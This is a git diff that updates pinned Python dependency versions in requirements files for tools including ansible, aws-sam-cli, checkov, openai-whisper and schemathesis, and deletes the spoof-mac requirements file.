diff --git a/requirements/ansible-requirements.txt b/requirements/ansible-requirements.txt
index 7a36943d..10da9c28 100644
--- a/requirements/ansible-requirements.txt
+++ b/requirements/ansible-requirements.txt
@@ -3,8 +3,8 @@ apache-libcloud==3.8.0
attrs==23.1.0
autopage==0.5.2
bcrypt==4.0.1
-boto3==1.28.80
-botocore==1.31.80
+boto3==1.28.83
+botocore==1.31.83
cachetools==5.3.2
charset-normalizer==3.3.2
cliff==4.3.0
@@ -44,7 +44,7 @@ oslo-context==5.2.0
oslo-i18n==6.1.0
oslo-log==5.3.0
oslo-serialization==5.2.0
-oslo-utils==6.2.1
+oslo-utils==6.3.0
paramiko==3.3.1
passlib==1.7.4
pbr==6.0.0
@@ -86,7 +86,7 @@ tzdata==2023.3
urllib3==1.26.18
wcwidth==0.2.9
websocket-client==1.6.4
-wrapt==1.15.0
+wrapt==1.16.0
xmltodict==0.13.0
yamlordereddictloader==0.4.2
zabbix-api==0.5.6
diff --git a/requirements/aws-sam-cli-requirements.txt b/requirements/aws-sam-cli-requirements.txt
index 3515a299..6392c8bd 100644
--- a/requirements/aws-sam-cli-requirements.txt
+++ b/requirements/aws-sam-cli-requirements.txt
@@ -4,17 +4,17 @@ attrs==23.1.0
aws-lambda-builders==1.40.0
aws-sam-translator==1.79.0
binaryornot==0.4.4
-blinker==1.6.3
-boto3==1.28.74
-boto3-stubs==1.28.69
-botocore==1.31.74
-botocore-stubs==1.31.74
+blinker==1.7.0
+boto3==1.28.83
+boto3-stubs==1.28.80
+botocore==1.31.83
+botocore-stubs==1.31.83
cfn-lint==0.83.1
chardet==5.2.0
-charset-normalizer==3.3.1
+charset-normalizer==3.3.2
chevron==0.14.0
click==8.1.7
-cookiecutter==2.3.1
+cookiecutter==2.4.0
dateparser==1.1.8
docker==6.1.3
flask==3.0.0
@@ -34,42 +34,42 @@ markupsafe==2.1.3
mdurl==0.1.2
mpmath==1.3.0
mypy-boto3-apigateway==1.28.36
-mypy-boto3-cloudformation==1.28.64
+mypy-boto3-cloudformation==1.28.83
mypy-boto3-ecr==1.28.45
-mypy-boto3-iam==1.28.71
+mypy-boto3-iam==1.28.79
mypy-boto3-kinesis==1.28.36
-mypy-boto3-lambda==1.28.63
+mypy-boto3-lambda==1.28.83
mypy-boto3-s3==1.28.55
mypy-boto3-schemas==1.28.36
mypy-boto3-secretsmanager==1.28.67
mypy-boto3-signer==1.28.36
-mypy-boto3-sqs==1.28.36
+mypy-boto3-sqs==1.28.82
mypy-boto3-stepfunctions==1.28.36
mypy-boto3-sts==1.28.58
mypy-boto3-xray==1.28.64
networkx==3.2.1
-pbr==5.11.1
+pbr==6.0.0
pydantic==2.4.2
pydantic-core==2.10.1
-pyopenssl==23.2.0
+pyopenssl==23.3.0
python-dateutil==2.8.2
python-slugify==8.0.1
referencing==0.30.2
regex==2023.10.3
requests==2.31.0
rich==13.6.0
-rpds-py==0.10.6
-ruamel-yaml==0.18.3
+rpds-py==0.12.0
+ruamel-yaml==0.18.5
ruamel-yaml-clib==0.2.8
s3transfer==0.7.0
sarif-om==1.0.4
sympy==1.12
text-unidecode==1.3
-tomlkit==0.12.1
-types-awscrt==0.19.6
+tomlkit==0.12.2
+types-awscrt==0.19.9
types-python-dateutil==2.8.19.14
types-s3transfer==0.7.0
-tzlocal==5.1
+tzlocal==5.2
urllib3==2.0.7
watchdog==3.0.0
websocket-client==1.6.4
diff --git a/requirements/censys-requirements.txt b/requirements/censys-requirements.txt
index 776f43ae..c96cf14a 100644
--- a/requirements/censys-requirements.txt
+++ b/requirements/censys-requirements.txt
@@ -1,5 +1,5 @@
backoff==2.2.1
-charset-normalizer==3.3.0
+charset-normalizer==3.3.2
idna==3.4
markdown-it-py==3.0.0
mdurl==0.1.2
diff --git a/requirements/checkov-requirements.txt b/requirements/checkov-requirements.txt
index fb88c196..d1162a23 100644
--- a/requirements/checkov-requirements.txt
+++ b/requirements/checkov-requirements.txt
@@ -1,8 +1,9 @@
aiodns==3.1.1
-aiohttp==3.9.0b0
+aiohttp==3.9.0b1
aiomultiprocess==0.9.0
aiosignal==1.3.1
annotated-types==0.6.0
+anyio==3.7.1
async-timeout==4.0.3
attrs==23.1.0
bc-detect-secrets==1.4.30
@@ -11,12 +12,11 @@ bc-python-hcl2==0.3.51
beartype==0.16.4
beautifulsoup4==4.12.2
boolean-py==4.0
-boto3==1.28.78
-botocore==1.31.78
+boto3==1.28.82
+botocore==1.31.82
cached-property==1.5.2
cachetools==5.3.2
charset-normalizer==3.3.2
-click==8.1.7
click-option-group==0.5.6
cloudsplaining==0.6.2
colorama==0.4.6
@@ -25,12 +25,16 @@ contextlib2==21.6.0
cyclonedx-python-lib==5.1.1
decorator==5.1.1
defusedxml==0.7.1
+distro==1.8.0
docker==6.1.3
dockerfile-parse==2.0.1
dpath==2.1.3
frozenlist==1.4.0
gitdb==4.0.11
gitpython==3.1.40
+h11==0.14.0
+httpcore==1.0.1
+httpx==0.25.1
idna==3.4
igraph==0.10.8
importlib-metadata==6.8.0
@@ -44,7 +48,7 @@ lark==1.1.8
license-expression==30.1.1
multidict==6.0.4
networkx==2.6.3
-openai==0.28.1
+openai==1.2.0
packageurl-python==0.11.2
ply==3.11
policy-sentry==0.12.10
@@ -65,6 +69,7 @@ s3transfer==0.7.0
schema==0.7.5
semantic-version==2.10.0
smmap==5.0.1
+sniffio==1.3.0
sortedcontainers==2.4.0
soupsieve==2.5
spdx-tools==0.8.2
diff --git a/requirements/openai-whisper-requirements.txt b/requirements/openai-whisper-requirements.txt
index f80872c9..04e9f687 100644
--- a/requirements/openai-whisper-requirements.txt
+++ b/requirements/openai-whisper-requirements.txt
@@ -1,11 +1,16 @@
-charset-normalizer==3.2.0
+charset-normalizer==3.3.2
+filelock==3.13.1
+fsspec==2023.10.0
idna==3.4
-llvmlite==0.40.1
+jinja2==3.1.2
+llvmlite==0.41.1
more-itertools==10.1.0
-numba==0.57.1
-numpy==1.24.4
-regex==2023.8.8
+mpmath==1.3.0
+networkx==3.2.1
+numba==0.58.1
+regex==2023.10.3
requests==2.31.0
-tiktoken==0.3.3
+sympy==1.12
+tiktoken==0.5.1
tqdm==4.66.1
-urllib3==2.0.4
+urllib3==2.0.7
diff --git a/requirements/pytorch-requirements.txt b/requirements/pytorch-requirements.txt
index a9d654cc..719cebfe 100644
--- a/requirements/pytorch-requirements.txt
+++ b/requirements/pytorch-requirements.txt
@@ -1,6 +1,6 @@
-filelock==3.12.0
+filelock==3.12.4
Jinja2==3.1.2
mpmath==1.3.0
networkx==3.1
opt-einsum==3.3.0
-sympy==1.11.1
+sympy==1.12
diff --git a/requirements/ruff-lsp-requirements.txt b/requirements/ruff-lsp-requirements.txt
index f13f3acf..d5f20f34 100644
--- a/requirements/ruff-lsp-requirements.txt
+++ b/requirements/ruff-lsp-requirements.txt
@@ -1,5 +1,5 @@
attrs==23.1.0
cattrs==23.1.2
lsprotocol==2023.0.0b1
-pygls==1.1.1
-typeguard==3.0.2
+pygls==1.1.2
+typeguard==4.1.5
diff --git a/requirements/schemathesis-requirements.txt b/requirements/schemathesis-requirements.txt
index 5c0f574f..1297232e 100644
--- a/requirements/schemathesis-requirements.txt
+++ b/requirements/schemathesis-requirements.txt
@@ -1,18 +1,18 @@
anyio==4.0.0
attrs==23.1.0
backoff==2.2.1
-charset-normalizer==3.3.1
+charset-normalizer==3.3.2
colorama==0.4.6
graphql-core==3.2.3
h11==0.14.0
-httpcore==0.18.0
-httpx==0.25.0
-hypothesis==6.88.1
+httpcore==1.0.1
+httpx==0.25.1
+hypothesis==6.88.3
hypothesis-graphql==0.10.0
hypothesis-jsonschema==0.22.1
idna==3.4
iniconfig==2.0.0
-jsonschema==4.19.1
+jsonschema==4.19.2
jsonschema-specifications==2023.7.1
junit-xml==1.9
multidict==6.0.4
@@ -22,10 +22,10 @@ pytest==7.4.3
pytest-subtests==0.7.0
referencing==0.30.2
requests==2.31.0
-rpds-py==0.10.6
+rpds-py==0.12.0
sniffio==1.3.0
sortedcontainers==2.4.0
-starlette==0.31.1
+starlette==0.32.0.post1
starlette-testclient==0.2.0
tomli==2.0.1
tomli-w==1.0.0
diff --git a/requirements/spoof-mac-requirements.txt b/requirements/spoof-mac-requirements.txt
deleted file mode 100644
index 1d9dff81..00000000
--- a/requirements/spoof-mac-requirements.txt
+++ /dev/null
@@ -1 +0,0 @@
-docopt==0.6.2
diff --git a/requirements/torchvision-requirements.txt b/requirements/torchvision-requirements.txt
index ed180135..68bf0810 100644
--- a/requirements/torchvision-requirements.txt
+++ b/requirements/torchvision-requirements.txt
@@ -1,4 +1,4 @@
-charset-normalizer==3.1.0
+charset-normalizer==3.3.0
idna==3.4
-requests==2.30.0
-urllib3==2.0.2
+requests==2.31.0
+urllib3==2.0.6
diff --git a/requirements/vunnel-requirements.txt b/requirements/vunnel-requirements.txt
index 636373e8..3733d807 100644
--- a/requirements/vunnel-requirements.txt
+++ b/requirements/vunnel-requirements.txt
@@ -2,7 +2,6 @@ charset-normalizer==3.3.2
click-default-group==1.2.4
colorlog==6.7.0
cvss==2.6
-dataclass-wizard==0.22.2
defusedxml==0.7.1
docformatter==1.7.5
future==0.18.3
@@ -11,6 +10,7 @@ ijson==2.6.1
importlib-metadata==6.8.0
iniconfig==2.0.0
jinja2==3.1.2
+mashumaro==3.10
mergedeep==1.3.4
orjson==3.9.10
pluggy==1.3.0